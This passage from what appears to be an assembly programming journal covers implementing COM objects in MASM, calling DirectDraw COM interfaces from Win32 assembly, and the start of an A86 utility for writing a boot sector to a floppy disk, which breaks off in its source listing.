     Data1   dd ?
     Data2   dw ?
     Data3   dw ?
     Data4   db 8 dup(?)
GUID ENDS

A GUID is then defined in the data section:
MyGUID GUID <3F2504E0h, 4f89h, 11D3h, <9Ah, 0C3h, 0h, 0h, 0E8h, 2Ch, 3h, 1h>>
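
To check how those 16 bytes end up in memory, here is a short Python sketch
using the standard struct and uuid modules. The pack_guid helper is my own
name, and little-endian x86 layout is assumed.

```python
import struct
import uuid

def pack_guid(data1, data2, data3, data4):
    """Lay out a GUID the way the GUID STRUCT does on little-endian x86."""
    return struct.pack("<IHH8B", data1, data2, data3, *data4)

raw = pack_guid(0x3F2504E0, 0x4F89, 0x11D3,
                (0x9A, 0xC3, 0x00, 0x00, 0xE8, 0x2C, 0x03, 0x01))
print(len(raw), uuid.UUID(bytes_le=raw))
```

The first three fields are stored low byte first, while Data4 is a plain byte
array and keeps its order.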

Once a GUID is assigned to an interface and published, no further changes to
the interface definition are allowed.  Note that this does not mean that the
interface implementation may not change, only the definition.  For changes
to the interface definition, a new GUID must be assigned.


COM Objects
------------------------------------------------------------------------------
A COM object is simply an implementation of an interface.  Implementation
details are not covered by the COM standard, so we are free to implement our
objects as we choose, so long as they satisfy all the requirements of the
interface definition.

A typical object will contain pointers to the various interfaces it supports,
a reference count, and any other data that the object needs.  Here is a sample
object definition, implemented as a structure:

Object struct
     interface   IInterface  <?>     ; pointer to an IInterface
     nRefCount   dd          ?       ; reference count
     nValue      dd          ?       ; private object data
Object ends

We also have to define the vtables we are going to be using.  These tables
must be static, and cannot change during run-time.  Each member of the vtable
is a pointer to a method.  Following is a method for defining the vtable.

@@IInterface segment dword
vtblIInterface:
     dd      offset IInterface@QueryInterface
     dd      offset IInterface@AddRef
     dd      offset IInterface@Release
     dd      offset IInterface@GetValue
     dd      offset IInterface@SetValue
@@IInterface ends


Reference Counting
------------------------------------------------------------------------------
COM objects manage their lifetimes through reference counting.  Each object
maintains a reference count that keeps track of how many instances of the
interface pointer have been created.  The object is required to keep a
counter that supports 2^32 instances, meaning the reference count must be a
DWORD.

When the reference count drops to zero, the object is no longer in use, and
it destroys itself.  The 2 IUnknown methods AddRef and Release handle the
reference counting for a COM object.
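
The life cycle can be sketched in a few lines of Python before we get to the
assembly. RefCounted is a hypothetical stand-in, not a real COM binding; it
only models the counter and the point at which the object would free itself.

```python
class RefCounted:
    """Hypothetical stand-in for a COM object; not a real COM binding."""

    def __init__(self):
        self.ref_count = 0
        self.destroyed = False

    def add_ref(self):
        self.ref_count = (self.ref_count + 1) & 0xFFFFFFFF   # DWORD counter
        return self.ref_count

    def release(self):
        self.ref_count -= 1
        if self.ref_count == 0:
            self.destroyed = True      # a real object would free itself here
        return self.ref_count

obj = RefCounted()
obj.add_ref()      # first interface pointer handed out
obj.add_ref()      # a copy of that pointer
obj.release()
print(obj.destroyed)
obj.release()
print(obj.destroyed)
```

The object survives the first release because a second pointer is still
outstanding; only the last release destroys it.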


QueryInterface
------------------------------------------------------------------------------
The QueryInterface method is used by a client to determine if the object
supports a given interface, and then if supported, to get the interface
pointer.  There are 3 rules to implementing the QueryInterface method:

     1. Objects must have an identity - a call to QueryInterface for IUnknown
        must always return the same pointer value.
     2. The set of interfaces of an object must never change - for example, if
        a call to QueryInterface with one IID succeeds once, it must succeed
        always.  Likewise, if it fails once, it must fail always.
     3. It must be possible to successfully query an interface of an object
        from any other interface.

QueryInterface returns a pointer to a specified interface on an object to
which a client currently holds an interface pointer. This function must call
the AddRef method on the pointer it returns.

Following are the QueryInterface parameters:
     pif  : [in] a pointer to the calling interface
     riid : [in] pointer to the IID of the interface being queried
     ppv  : [out] pointer to the pointer of the interface that is to be set.
            If the interface is not supported, the pointed to value is set to 0

QueryInterface returns the following:
    S_OK if the interface is supported
    E_NOINTERFACE if not supported

Here is a simple assembly implementation of QueryInterface:

IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
     ; The following compares the requested IID with the available ones.
     ; In this case, because IInterface inherits from IUnknown, the IInterface
     ; interface is prefixed with the IUnknown methods, and these 2 interfaces
     ; share the same interface pointer.
     invoke  IsEqualGUID, [riid], addr IID_IInterface
     or      eax,eax
     jnz     @1
     invoke  IsEqualGUID, [riid], addr IID_IUnknown
     or      eax,eax
     jnz     @1
     jmp     @NoInterface

@1:
     ; GETOBJECTPOINTER is a macro that will put the object pointer into eax,
     ; when given the name of the object, the name of the interface, and the
     ; interface pointer.
     GETOBJECTPOINTER    Object, interface, pif

     ; now get the pointer to the requested interface
     lea     eax, (Object ptr [eax]).interface

     ; set *ppv with this interface pointer
     mov     ebx, [ppv]
     mov     dword ptr [ebx], eax

     ; increment the reference count by calling AddRef
     GETOBJECTPOINTER    Object, interface, pif
     mov     eax, (Object ptr [eax]).interface
     invoke  (IInterfaceVtbl ptr [eax]).AddRef, pif

     ; return S_OK
     mov     eax, S_OK
     jmp     return

@NoInterface:
     ; interface not supported, so set *ppv to zero
     mov     eax, [ppv]
     mov     dword ptr [eax], 0

     ; return E_NOINTERFACE
     mov     eax, E_NOINTERFACE

return:
     ret
IInterface@QueryInterface endp
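
For readers who find the control flow easier to follow in C, here is a rough
model of the same logic.  It is only a sketch: the Guid type, the two IID
values and the function names are made up for the example, and the AddRef is
done inline rather than through the vtable.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef uint32_t HResult;                 /* HRESULT is a 32-bit status code */
#define S_OK          0x00000000u
#define E_NOINTERFACE 0x80004002u

typedef struct { uint8_t bytes[16]; } Guid;   /* 128-bit interface ID */

typedef struct {
    const void *vtbl;       /* interface part: just the vtable pointer */
    uint32_t    ref_count;  /* object data */
} Object;

/* Made-up IIDs for this sketch, NOT the real IID_IUnknown value. */
static const Guid IID_Unknown_Model   = {{0x01}};
static const Guid IID_Interface_Model = {{0x02}};

static int guid_equal(const Guid *a, const Guid *b)
{
    return memcmp(a->bytes, b->bytes, sizeof a->bytes) == 0;
}

static HResult query_interface(Object *self, const Guid *riid, void **ppv)
{
    if (guid_equal(riid, &IID_Interface_Model) ||
        guid_equal(riid, &IID_Unknown_Model)) {
        *ppv = self;          /* both IIDs share the one interface pointer */
        self->ref_count++;    /* the AddRef that QueryInterface must perform */
        return S_OK;
    }
    *ppv = NULL;              /* unsupported: clear the out pointer */
    return E_NOINTERFACE;
}
```

Because both IIDs hand back the same pointer, rules 1 and 3 hold trivially
in this model; an object with several interfaces would need more care.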


AddRef
------------------------------------------------------------------------------
The AddRef method is used to increment the reference count for an interface
of an object.  It should be called for every new copy of an interface pointer
to an object.

AddRef takes no parameters, other than the interface pointer required for all
methods.  AddRef should return the new reference count.  However, this value
is to be used by callers only for testing purposes, as it may be unstable in
certain situations.

Following is a simple implementation of the AddRef method:

IInterface@AddRef proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     ; increment the reference count
     inc     [(Object ptr [eax]).nRefCount]
     ; now return the count
     mov     eax, [(Object ptr [eax]).nRefCount]
     ret
IInterface@AddRef endp


Release
------------------------------------------------------------------------------
Release decrements the reference count for the calling interface on an object.
If the reference count on the object is decremented to 0, then the object is
freed from memory.  This function should be called when you no longer need to
use an interface pointer.

Like AddRef, Release takes only one parameter - the interface pointer.  It
also returns the current value of the reference count, which, similarly, is to
be used for testing purposes only.

Here is a simple implementation of Release:

IInterface@Release proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif

     ; decrement the reference count
     dec     [(Object ptr [eax]).nRefCount]

     ; check to see if the reference count is zero.  If it is, then destroy
     ; the object.
     mov     eax, [(Object ptr [eax]).nRefCount]
     or      eax, eax
     jnz     @1

     ; free the object: here we have assumed the object was allocated with
     ; LocalAlloc and with LMEM_FIXED option
     GETOBJECTPOINTER    Object, interface, pif
     invoke  LocalFree, eax
@1:
     ret
IInterface@Release endp
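
The life cycle that AddRef and Release implement can be modelled in a few
lines of C.  This is a sketch under assumptions: the Counted type and the
freed_flag hook are invented so that the destruction can be observed, and
the creator starts with a count of 1 instead of zeroing the count and
calling QueryInterface as this article does.

```c
#include <stdint.h>
#include <stdlib.h>

typedef struct {
    uint32_t ref_count;
    int     *freed_flag;   /* hypothetical hook: set to 1 when the object dies */
} Counted;

static Counted *counted_create(int *freed_flag)
{
    Counted *obj = malloc(sizeof *obj);
    if (obj) {
        obj->ref_count  = 1;          /* the creator holds the first reference */
        obj->freed_flag = freed_flag;
    }
    return obj;
}

static uint32_t counted_add_ref(Counted *obj)
{
    return ++obj->ref_count;          /* one more copy of the pointer exists */
}

static uint32_t counted_release(Counted *obj)
{
    uint32_t remaining = --obj->ref_count;  /* read the count before any free */
    if (remaining == 0) {
        if (obj->freed_flag)
            *obj->freed_flag = 1;
        free(obj);                          /* obj must not be used after this */
    }
    return remaining;
}
```

Note that the count is copied into a local before the object is freed, so
the return value never reads freed memory.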


Creating a COM object
------------------------------------------------------------------------------
Creating an object consists basically of allocating the memory for the
object, and then initializing its data members.  Typically, the vtable
pointer is initialized and the reference count is zeroed.  QueryInterface
could then be called to get the interface pointer.

Other methods exist for creating objects, such as using CoCreateInstance, and
using class factories.  These methods will not be discussed, and may be a
topic for a future article.


COM implementation sample application
------------------------------------------------------------------------------
Here follows a sample implementation and usage of a COM object.  It shows how
to create the object, call its methods, then free it.  It would probably be
very educational to assemble this and run it through a debugger.  This and
other examples can be found at http://asm.tsx.org.


.386
.model flat,stdcall

include windows.inc
include kernel32.inc
include user32.inc

includelib kernel32.lib
includelib user32.lib
includelib uuid.lib

;-----------------------------------------------------------------------------
; Macro to simplify interface declarations
; Borrowed from Ewald, http://here.is/diamond/
STDMETHOD   MACRO   name, argl :VARARG
LOCAL @tmp_a
LOCAL @tmp_b
@tmp_a  TYPEDEF PROTO argl
@tmp_b  TYPEDEF PTR @tmp_a
name    @tmp_b      ?
ENDM

; Macro that takes an interface pointer and returns the implementation
; pointer in eax
GETOBJECTPOINTER MACRO Object, Interface, pif
     mov     eax, pif
     IF (Object.Interface)
         sub     eax, Object.Interface
     ENDIF
ENDM

;-----------------------------------------------------------------------------
IInterface@QueryInterface   proto :DWORD, :DWORD, :DWORD
IInterface@AddRef           proto :DWORD
IInterface@Release          proto :DWORD
IInterface@GetValue         proto :DWORD
IInterface@SetValue         proto :DWORD, :DWORD

CreateObject                proto :DWORD
IsEqualGUID                 proto :DWORD, :DWORD

externdef                   IID_IUnknown:GUID

;-----------------------------------------------------------------------------
; declare the interface prototype
IInterface struct
     lpVtbl  dd  ?
IInterface ends

IInterfaceVtbl struct
     ; IUnknown methods
     STDMETHOD       QueryInterface, pif:DWORD, riid:DWORD, ppv:DWORD
     STDMETHOD       AddRef, pif:DWORD
     STDMETHOD       Release, pif:DWORD
     ; IInterface methods
     STDMETHOD       GetValue, pif:DWORD
     STDMETHOD       SetValue, pif:DWORD, val:DWORD
IInterfaceVtbl ends


; declare the object structure
Object struct
     ; interface object
     interface   IInterface  <?>

     ; object data
     nRefCount   dd          ?
     nValue      dd          ?
Object ends

;-----------------------------------------------------------------------------
.data
; define the vtable
@@IInterface segment dword
vtblIInterface:
     dd      offset IInterface@QueryInterface
     dd      offset IInterface@AddRef
     dd      offset IInterface@Release
     dd      offset IInterface@GetValue
     dd      offset IInterface@SetValue
@@IInterface ends

; define the interface's IID
; {CF2504E0-4F89-11d3-9AC3-0000E82C0301}
IID_IInterface GUID <0cf2504e0h, 04f89h, 011d3h, <09ah, 0c3h, 00h, 00h,
                       0e8h, 02ch, 03h, 01h>>

;-----------------------------------------------------------------------------
.code
start:
StartProc proc
     LOCAL   pif:DWORD       ; interface pointer

     ; create the object
     invoke  CreateObject, addr [pif]
     or      eax,eax
     js      exit

     ; call the SetValue method
     mov     eax, [pif]
     mov     eax, [eax]
     invoke  (IInterfaceVtbl ptr [eax]).SetValue, [pif], 12345h

     ; call the GetValue method
     mov     eax, [pif]
     mov     eax, [eax]
     invoke  (IInterfaceVtbl ptr [eax]).GetValue, [pif]

     ; release the object
     mov     eax, [pif]
     mov     eax, [eax]
     invoke  (IInterfaceVtbl ptr [eax]).Release, [pif]

exit:
     ret
StartProc endp

;-----------------------------------------------------------------------------
IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
     invoke  IsEqualGUID, [riid], addr IID_IInterface
     test    eax,eax
     jnz     @F
     invoke  IsEqualGUID, [riid], addr IID_IUnknown
     test    eax,eax
     jnz     @F
     jmp     @Error

@@:
     GETOBJECTPOINTER    Object, interface, pif
     lea     eax, (Object ptr [eax]).interface

     ; set *ppv
     mov     ebx, [ppv]
     mov     dword ptr [ebx], eax

     ; increment the reference count
     GETOBJECTPOINTER    Object, interface, pif
     mov     eax, (Object ptr [eax]).interface
     invoke  (IInterfaceVtbl ptr [eax]).AddRef, [pif]

     ; return S_OK
     mov     eax, S_OK
     jmp     return

@Error:
     ; error, interface not supported
     mov     eax, [ppv]
     mov     dword ptr [eax], 0
     mov     eax, E_NOINTERFACE

return:
     ret
IInterface@QueryInterface endp


IInterface@AddRef proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     inc     [(Object ptr [eax]).nRefCount]
     mov     eax, [(Object ptr [eax]).nRefCount]
     ret
IInterface@AddRef endp


IInterface@Release proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     dec     [(Object ptr [eax]).nRefCount]
     mov     eax, [(Object ptr [eax]).nRefCount]
     or      eax, eax
     jnz     @1
     ; free object: LocalFree needs the object pointer, not the vtable pointer
     GETOBJECTPOINTER    Object, interface, pif
     invoke  LocalFree, eax
@1:
     ret
IInterface@Release endp


IInterface@GetValue proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     mov     eax, (Object ptr [eax]).nValue
     ret
IInterface@GetValue endp


IInterface@SetValue proc uses ebx pif:DWORD, val:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     mov     ebx, eax
     mov     eax, [val]
     mov     (Object ptr [ebx]).nValue, eax
     ret
IInterface@SetValue endp

;-----------------------------------------------------------------------------
CreateObject proc uses ebx ecx pobj:DWORD
     ; set *pobj to 0
     mov     eax, pobj
     mov     dword ptr [eax], 0

     ; allocate object
     invoke  LocalAlloc, LMEM_FIXED, sizeof Object
     or      eax, eax
     jnz     @1
     ; alloc failed, so return
     mov     eax, E_OUTOFMEMORY
     jmp     return
@1:

     mov     ebx, eax
     mov     (Object ptr [ebx]).interface.lpVtbl, offset vtblIInterface
     mov     (Object ptr [ebx]).nRefCount, 0
     mov     (Object ptr [ebx]).nValue, 0

     ; Query the interface
     lea     ecx, (Object ptr [ebx]).interface
     mov     eax, (Object ptr [ebx]).interface.lpVtbl
     invoke  (IInterfaceVtbl ptr [eax]).QueryInterface,
             ecx,
             addr IID_IInterface,
             [pobj]
     cmp     eax, S_OK
     je      return

     ; error in QueryInterface, so free memory
     push    eax
     invoke  LocalFree, ebx
     pop     eax

return:
     ret
CreateObject endp

;-----------------------------------------------------------------------------
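IsEqualGUID proc uses esi edi rguid1:DWORD, rguid2:DWORD
     cld
     mov     esi, [rguid1]
     mov     edi, [rguid2]
     mov     ecx, sizeof GUID / 4
     xor     eax, eax            ; clear the result before the compare sets ZF
     repe    cmpsd               ; stops at the first dword that differs
     sete    al                  ; ZF is set only if every dword matched
     ret
IsEqualGUID endp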

end start
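
The GETOBJECTPOINTER macro in the listing subtracts the offset of the
interface member from the interface pointer.  In the sample the interface is
the first member, so the offset is zero and no code is emitted.  The C sketch
below shows the same trick with a non-zero offset; the Obj layout and the
macro name are made up for the illustration.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct { const void *lpVtbl; } Iface;

/* Hypothetical object whose interface is NOT the first member,
   so the pointer adjustment is non-zero. */
typedef struct {
    uint32_t nRefCount;
    Iface    iface;
    uint32_t nValue;
} Obj;

/* Same idea as GETOBJECTPOINTER: step back from the interface
   pointer by the member offset to reach the start of the object. */
#define OBJECT_FROM_IFACE(type, member, pif) \
    ((type *)((char *)(pif) - offsetof(type, member)))

static uint32_t obj_get_value(Iface *pif)
{
    Obj *self = OBJECT_FROM_IFACE(Obj, iface, pif);
    return self->nValue;
}
```

A method only ever receives the interface pointer, so this adjustment is
what lets it reach the reference count and the other object data.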


Conclusion
------------------------------------------------------------------------------
We have (hopefully) seen how to implement a COM object.  We can see that it
is a bit messy to do, and adds quite some overhead to our programs.  However,
it can also add great flexibility and power to our programs.

Remember that COM defines only interfaces, and implementation is left to the
programmer.  This article presents only one possible implementation.  This is
not the only method, nor is it the best one.  The reader should feel free to
experiment with other methods.

                 Copyright (C) 1999 Bill Tyler  (billasm@...)



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..........................................FEATURE.ARTICLE
                                                   How to use DirectDraw in ASM
                                                   by X-Calibre [Diamond]


There has been quite a large demand for this essay, so I finally started
writing it. This essay will show you how to use C++ objects and COM interfaces
in Win32ASM, using DirectDraw as an example.

In this part of the Win32 API, you will soon find out how important it is to
know C and C++ when you want to use an API written in these languages.
Judging from the demand for this essay, I think it will be necessary to
explain a bit of how objects work in C++. I will not go too deep, but only
show the things you need to know in Win32ASM.

What are objects really?

Actually a structure is an object of which all fields are public. We will look
at it the other way around. So the public fields in an object make up a
structure. The other fields in an object are private and are not reachable
from the outside. So they are not interesting to us.

A special thing about objects is that they can contain pointers to functions.
Normally, when using C or ASM, this would be possible, but a bit error-prone,
because nothing checks that each pointer really refers to a function of the
right kind. It can be seen as 'dirty' programming. That's why you probably
haven't seen it before.

When using C++, the compiler sets up and type-checks these pointers for you.
So as long as the compiler does its job, you can use this technique with far
less chance of errors, and it gives you some nice new programming options.

C++ goes even further with this 'structure of functions' idea. With
inheritance, you can also override functions of the base class in the
inherited class. You can also create 'virtual' functions, which are declared
in the base class, but the actual code is only in inherited classes.

This is of course interesting for DirectX, where you want to have standard
functions, but with different code, depending on the hardware on which it is
running. So in DirectX, all functions are defined as virtual, and the base
class is inherited by hardware-specific drivers which supply hardware-specific
code. And the beauty of this is, that it's all transparent to the programmer.
The function pointers can change at runtime because of this system, so the C++
designers had to think of a way to keep the pointers to the functions
available to the program at all time.

What this all boils down to is that there is a table with pointers to the
functions. It's called the Virtual Function Table. I will call this the
vtable from now on.
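
To make the idea concrete, here is a small C model of a vtable. It is only a
sketch: the Display type, the single bits_per_pixel slot and the two 'drivers'
are invented for the example and have nothing to do with the real DirectX
tables.

```c
typedef struct Display Display;

typedef struct {
    int (*bits_per_pixel)(Display *self);   /* one slot in the table */
} DisplayVtbl;

struct Display {
    const DisplayVtbl *lpVtbl;   /* first member: pointer to the vtable */
};

/* Two made-up drivers supplying different code for the same slot. */
static int vga_bpp(Display *self)  { (void)self; return 8;  }
static int svga_bpp(Display *self) { (void)self; return 32; }

static const DisplayVtbl vga_vtbl  = { vga_bpp };
static const DisplayVtbl svga_vtbl = { svga_bpp };

/* The caller never names a driver; it only follows the pointers. */
static int query_bpp(Display *d)
{
    return d->lpVtbl->bits_per_pixel(d);
}
```

The same call ends up in different code depending on which table the object
points to, which is the transparency described above.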

So we need to get this table, in order to call functions from our object.
Lucky for you, Z-Nith has already made a C program to 'capture' the table,
and converted the resulting header file to an include file for use with MASM.
So I'll just explain how you should use this table, and you can get going
soon.

Well, actually it's quite simple. The DirectX objects are defined like this:

IDirectDraw        STRUC
     lpVtbl DWORD ?
IDirectDraw        ENDS

IDirectDrawPalette STRUC
     lpVtbl DWORD ?
IDirectDrawPalette ENDS

IDirectDrawClipper STRUC
     lpVtbl DWORD ?
IDirectDrawClipper ENDS

IDirectDrawSurface STRUC
     lpVtbl DWORD ?
IDirectDrawSurface ENDS

So these structs are actually just a pointer to the vtables, and don't contain
any other values. Well, this makes it all very easy for us then.
I'll give you a small example:

Say we have an IDirectDraw object called lpDD. And we want to call the
RestoreDisplayMode function.
Then we need to do 2 things:

1. Get the vtable.
2. Get the address of the function, using the vtable.

The first part is simple. All the struct contains, is the pointer to the
vtable. So we can just do this:

     mov  eax, [lpDD]
     mov  eax, [eax]

Simple, isn't it? And the next part isn't really much harder. The vtable is
put into a structure called IDirectDrawVtbl in DDRAW.INC. We now have the
address of the structure in eax. All we have to do now, is get the correct
member of that structure, to get the address of the function we want to call.
You would have guessed by now, that this will do the trick:

     call [IDirectDrawVtbl.RestoreDisplayMode][eax]

That is not a bad guess...
But there's one more thing, which is very important: this function needs to be
invoked on the IDirectDraw object. We may only see the vtable in the structure,
but there are also private members inside the object. So there's more than
meets the eye here. What it comes down to is that the call needs the object
as an argument. And this will be done by stack as always. So we just need to
push lpDD before we call. The complete call will look like this:

     push [lpDD]
     call [IDirectDrawVtbl.RestoreDisplayMode][eax]

Simple, was it not? And calls with arguments are not much harder.
Let's set the displaymode to 320x200 in 32 bits next.
This call requires 3 arguments:

SetDisplayMode( width, height, bpp );

Well, the extra arguments work just like normal API calls: just push them onto
the stack in backward order.
So it will look like this:

     push 32
     push 200
     push 320
     mov  eax, [lpDD]
     push eax
     mov  eax, [eax]
     call [IDirectDrawVtbl.SetDisplayMode][eax]

And that's all there is to it.

To make life easier, we have included some MASM macros in DDRAW.INC, for use
with the IDirectDraw and IDirectDrawSurface objects:

DDINVOKE  MACRO   func, this, arglist :VARARG
     mov  eax, [this]
     mov  eax, [eax]

     IFB <arglist>
         INVOKE [IDirectDrawVtbl. func][eax], this
     ELSE
         INVOKE [IDirectDrawVtbl. func][eax], this, arglist
     ENDIF
ENDM

DDSINVOKE MACRO   func, this, arglist :VARARG
     mov  eax, [this]
     mov  eax,  [eax]

     IFB <arglist>
         INVOKE [IDirectDrawSurfaceVtbl. func][eax], this
     ELSE
         INVOKE [IDirectDrawSurfaceVtbl. func][eax], this, arglist
     ENDIF
ENDM

With these macros, our 2 example calls will look as simple as this:

     DDINVOKE RestoreDisplayMode, lpDD

     DDINVOKE SetDisplayMode, lpDD, 320, 200, 32
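
For comparison, roughly the same macro can be written in C. This is a sketch
under assumptions: the two-entry DDrawVtbl is a stand-in and not the real
IDirectDrawVtbl layout, the model functions only record their arguments, and
the 640x480x8 mode that the restore function sets is an arbitrary choice.

```c
typedef struct DDraw DDraw;

typedef struct {
    long (*RestoreDisplayMode)(DDraw *self);
    long (*SetDisplayMode)(DDraw *self, int width, int height, int bpp);
} DDrawVtbl;   /* hypothetical two-entry table for the sketch */

struct DDraw {
    const DDrawVtbl *lpVtbl;
    int width, height, bpp;     /* stand-in for the object's private state */
};

static long model_restore(DDraw *self)
{
    self->width = 640; self->height = 480; self->bpp = 8;
    return 0;
}

static long model_set(DDraw *self, int w, int h, int bpp)
{
    self->width = w; self->height = h; self->bpp = bpp;
    return 0;
}

static const DDrawVtbl model_vtbl = { model_restore, model_set };

/* FIRST_ARG picks the object out of the argument list, so it can be used
   both to find the vtable and as the first argument of the call. */
#define FIRST_ARG(first, ...) (first)
#define DDINVOKE(func, ...) \
    (FIRST_ARG(__VA_ARGS__, 0)->lpVtbl->func(__VA_ARGS__))
```

Like the MASM version, the object expression is evaluated twice, so it should
not have side effects.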


Well, that's basically all there is to know about using objects, COM and
DirectX in Win32ASM. Have fun with it!

And remember:

C and C++ knowledge is power!



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    Writing Boot Sectors To Disk
                                                    by Jan Verhoeven


Introduction.
-------------
In my previous article I showed how to make a private non-bootable
bootsector for 1.44 Mb floppy disks. Unfortunately, there was no way yet to
write that non-bootsector to a floppy disk....

Enter this code. It is the accompanying bootsector writer for floppy disks.
It assumes that your A: drive is the 1.44 Mb floppy disk drive and I dare
say that this will be true in the majority of cases.


The assembler used
------------------
As usual, I have written this code in A86 format. Until now, not many
aspects of the A86 extensions have been used, but, believe me, in future
articles this will be done.

A86 is particularly useful for people that make syntax errors. It will
insert the error messages into the sourcefile so that you can easily find
them. In the next assembler run the error messages are removed again.

To fully use this aspect of A86 programming, I made a small batchfile that
will let me choose between several options while writing the code. Below
you can see the file. After an error, I choose to go back into the editor.
When there are no errors, I might decide to do a trial run. Or to quit to
DOS.

This is all done by means of the WACHT command which waits for a keypress.
It returns (in errorlevel) the indexed position in the command tail table
of the key which was pressed.


Rapid assembly prototyping.
---------------------------
For easy processing and running sourcefiles I use a small batchfile, which
looks like:

----------- Run.Bat --------------------------------------- Start ---------
@echo off
if "%1" == "" goto leave

:start
    ed %1.a86
    a86 %1.a86 %2 %3 %4 %5 %6

:menu
    Echo *
    Echo Options:
    Echo *Escape = stop
    Echo *     L = LIST
    echo *  ;-() = back to the editor
    echo * space = test-run of %1.com
    echo *Period = debugger-run with %1.com/sym

    wacht  .\=-[]';-()/":?><{}|+_LCE

if errorlevel 27 goto start
if errorlevel 26 goto screen
if errorlevel 25 goto list
if errorlevel  4 goto start
if errorlevel  3 goto debugger
if errorlevel  2 goto execute
if errorlevel  1 exit
goto menu

:execute
   %1
   if errorlevel 9 echo Errorlevel = 9+
   if errorlevel 8 echo Errorlevel = 8
   if errorlevel 7 echo Errorlevel = 7
   if errorlevel 6 echo Errorlevel = 6
   if errorlevel 5 echo Errorlevel = 5
   if errorlevel 4 echo Errorlevel = 4
   if errorlevel 3 echo Errorlevel = 3
   if errorlevel 2 echo Errorlevel = 2
   if errorlevel 1 echo Errorlevel = 1
   goto menu

:debugger
   vgamode 3
   d86 %1
   goto menu

:list
   list
   goto menu

:screen
   vgamode 3
   goto menu

:leave
   echo No file specified
----------- Run.Bat ---------------------------------------- End ----------
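
The order of the IF ERRORLEVEL lines matters, because the test is true for
the given value and for every higher one. The C sketch below models the menu
dispatch of Run.Bat; the enum names are made up, the thresholds are copied
from the batchfile.

```c
#include <stddef.h>

typedef enum {
    GO_MENU, GO_EXIT, GO_EXECUTE, GO_DEBUGGER, GO_START, GO_LIST, GO_SCREEN
} Action;

typedef struct { int threshold; Action action; } Rule;

/* Same order as the IF ERRORLEVEL lines under :menu in Run.Bat. */
static const Rule rules[] = {
    {27, GO_START}, {26, GO_SCREEN},   {25, GO_LIST},
    { 4, GO_START}, { 3, GO_DEBUGGER}, { 2, GO_EXECUTE}, { 1, GO_EXIT},
};

/* IF ERRORLEVEL n is true when the exit code is n OR HIGHER,
   so the first rule that matches from the top wins. */
static Action dispatch(int errorlevel)
{
    size_t i;
    for (i = 0; i < sizeof rules / sizeof rules[0]; i++) {
        if (errorlevel >= rules[i].threshold)
            return rules[i].action;
    }
    return GO_MENU;   /* nothing matched: fall through to GOTO MENU */
}
```

Every key from position 4 up to 24 therefore leads back to the editor. In the
:execute part nothing jumps away after a match, so an errorlevel of 3 will
also echo the lines for 2 and 1.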

This BAT file relies heavily on my computer system. For one, I use DR-DOS 6
which means that I can use the EXIT word to get out of a Batchfile.

Also, I switch videomodes back to Mode 3 with "Vgamode 3" and you will have
to use another command for that, like "Mode co80" or the utility that came
with your videocard.

The program "List" is Vernon Buerg's file lister which I use to track down
errors in all kinds of files.


How to write a sector to disk.
------------------------------
Globally there are three methods. The first would be to program the floppy
disk controller, but that is just downright difficult. A second approach
would be to use INT 026, the way DOS does things.

I chose the BIOS method. For non-partitioned disk structures this is the
easiest way. Just select track, head and sector and write data to the
sectors on that disk.

The bootsector is the very first sector on a disk. For a floppy disk this
boils down to track 0, head 0 and sector 1 (sectors are counted from 1, not
from 0!).
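
To see why track 0, head 0, sector 1 is "the very first sector", it helps to
number the sectors linearly. The C sketch below does that for the usual
1.44 Mb geometry of 80 tracks, 2 heads and 18 sectors per track; the function
name is made up.

```c
/* Geometry of a 1.44 Mb floppy: 80 tracks, 2 heads, 18 sectors per track. */
enum { FLOPPY_TRACKS = 80, FLOPPY_HEADS = 2, FLOPPY_SPT = 18 };

/* Linear sector number of a track/head/sector triple.
   Tracks and heads count from 0, sectors count from 1. */
static long chs_to_linear(int track, int head, int sector)
{
    return ((long)track * FLOPPY_HEADS + head) * FLOPPY_SPT + (sector - 1);
}
```

The bootsector comes out as linear sector 0, and the last sector of the disk
(track 79, head 1, sector 18) as 2879.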

The code is very straightforward. What it does is:

  - reset disk drive controller
  - open the file to transfer to the bootsector
  - read file into internal buffer
  - close the file
  - repeat 5 times:
  -   try to transfer buffer to bootsector of drive A:
  - shut down and return to DOS.
  - if an error occurs, the user is informed about it.

That's all there is to it.
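
The retry part of these steps can be sketched in C as follows. This is a
model, not the real thing: the write itself is a hypothetical callback that
stands in for the BIOS call, and flaky_write is a test double that fails a
given number of times.

```c
enum { MAX_TRIES = 5 };

/* Hypothetical callback standing in for the BIOS write: 0 means success. */
typedef int (*WriteSectorFn)(const unsigned char *sector, void *ctx);

/* Returns the number of attempts used (1..MAX_TRIES),
   or 0 if every attempt failed. */
static int write_with_retries(const unsigned char *sector,
                              WriteSectorFn write_sector, void *ctx)
{
    int attempt;
    for (attempt = 1; attempt <= MAX_TRIES; attempt++) {
        if (write_sector(sector, ctx) == 0)
            return attempt;
    }
    return 0;
}

/* Test double: fails as long as the counter behind ctx is above zero. */
static int flaky_write(const unsigned char *sector, void *ctx)
{
    int *failures_left = ctx;
    (void)sector;
    if (*failures_left > 0) {
        (*failures_left)--;
        return 1;
    }
    return 0;
}
```

The important point is that "all attempts failed" is reported by the loop
itself and not by whatever status the last helper call happened to leave
behind.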


The Source.
-----------
Below is the sourcecode for this short utility. I have commented just
about every line that I thought needed it.

----------- Wrs.A86 --------------------------------------- Start ---------
name     wrs
title    WRite Sector
page     80, 120

stdout   =  1                       ; the "standard" equates
lf       = 10
cr       = 13

   DATA segment                      ; define the volatile data area

buffer   db    512 dup (?)          ; this is enough for one sector

          EVEN                       ; make sure WORD starts at an even address
Handle   dw    ?                    ; handle number of file to write
; ----------------------
   CODE segment                      ; start of the actual code
                                     ; no ORG, so we start at offset 0100
          jmp   main                 ; jump forward to entry point

          db    'VeRsIoN=0.2', 0
